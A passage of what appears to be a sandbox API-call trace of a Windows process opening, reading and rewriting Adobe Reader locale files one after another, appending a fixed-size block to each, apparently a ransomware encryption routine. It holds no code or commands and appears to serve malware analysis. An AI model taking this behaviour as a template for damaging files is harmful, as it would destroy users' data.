dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.013] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.013] ReleaseMutex (hMutex=0x168) returned 1 [0072.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.ESP", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0072.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.ESP", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.ESP", lpUsedDefaultChar=0x0) returned 10 [0072.013] ReadFile (in: hFile=0x1bc, lpBuffer=0x25a4048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0072.015] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f800 [0072.015] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.016] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f800 [0072.016] WriteFile (in: hFile=0x1bc, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.016] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.017] WriteFile (in: hFile=0x1bc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0072.017] CloseHandle (hObject=0x1bc) returned 1 [0072.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\PPKLITE.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\ppklite.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0072.018] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.018] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x83c00 [0072.018] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.018] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.019] ReleaseMutex (hMutex=0x168) returned 1 [0072.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.ESP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.ESP", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.ESP", lpUsedDefaultChar=0x0) returned 11 [0072.019] ReadFile (in: hFile=0x1bc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0072.021] ReadFile (in: hFile=0x1bc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.022] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x82c00 [0072.022] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.024] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x82c00 [0072.024] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.025] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.025] WriteFile (in: hFile=0x1bc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0072.025] WriteFile (in: hFile=0x1bc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.025] CloseHandle (hObject=0x1bc) returned 1 [0072.026] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0072.027] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.027] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe7 [0072.027] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.027] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.027] ReleaseMutex (hMutex=0x168) returned 1 [0072.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0072.027] ReadFile (in: hFile=0x1bc, lpBuffer=0x26bf2f8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf2f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0072.028] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0072.028] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e93898*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93898*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0072.029] CloseHandle (hObject=0x1bc) returned 1 [0072.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\BRdlang32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\brdlang32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0072.029] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.029] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3400 [0072.030] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.030] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.030] ReleaseMutex (hMutex=0x168) returned 1 [0072.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.EUQ", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.EUQ", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.EUQ", lpUsedDefaultChar=0x0) returned 13 [0072.030] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.032] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2400 [0072.032] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.033] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2400 [0072.033] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.033] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.033] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.034] CloseHandle (hObject=0x1bc) returned 1 [0072.034] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Multimedia.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\multimedia.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0072.034] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.035] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13e00 [0072.035] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.035] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.035] ReleaseMutex (hMutex=0x168) returned 1 [0072.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.EUQ", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0072.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.EUQ", cchWideChar=14, lpMultiByteStr=0x1f7320c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.EUQ", lpUsedDefaultChar=0x0) returned 14 [0072.035] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.039] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12e00 [0072.039] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.040] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12e00 [0072.040] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.041] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.041] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.041] CloseHandle (hObject=0x1bc) returned 1 [0072.041] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\SendMail.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\sendmail.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.427] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.427] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4000 [0072.427] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.428] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.428] ReleaseMutex (hMutex=0x168) returned 1 [0072.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.EUQ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0072.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.EUQ", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.EUQ", lpUsedDefaultChar=0x0) returned 12 [0072.429] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.435] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0072.435] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.435] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0072.436] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.436] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.436] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.437] CloseHandle (hObject=0x1e8) returned 1 [0072.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\AdobeCollabSync.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\adobecollabsync.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.437] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.438] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0072.438] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.438] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.438] ReleaseMutex (hMutex=0x168) returned 1 [0072.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SUO", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0072.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SUO", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.SUO", lpUsedDefaultChar=0x0) returned 19 [0072.438] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0072.445] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0072.445] WriteFile (in: hFile=0x1e8, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0072.445] CloseHandle (hObject=0x1e8) returned 1 [0072.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\IA32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\ia32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.449] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.449] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe00 [0072.449] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.450] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.450] ReleaseMutex (hMutex=0x168) returned 1 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SUO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SUO", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.SUO", lpUsedDefaultChar=0x0) returned 8 [0072.450] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0072.456] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0072.456] WriteFile (in: hFile=0x1ec, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0072.457] CloseHandle (hObject=0x1ec) returned 1 [0072.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\SaveAsRTF.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\saveasrtf.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.457] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.458] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4800 [0072.458] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.458] ReleaseMutex (hMutex=0x168) returned 1 [0072.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SUO", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SUO", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.SUO", lpUsedDefaultChar=0x0) returned 13 [0072.458] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, 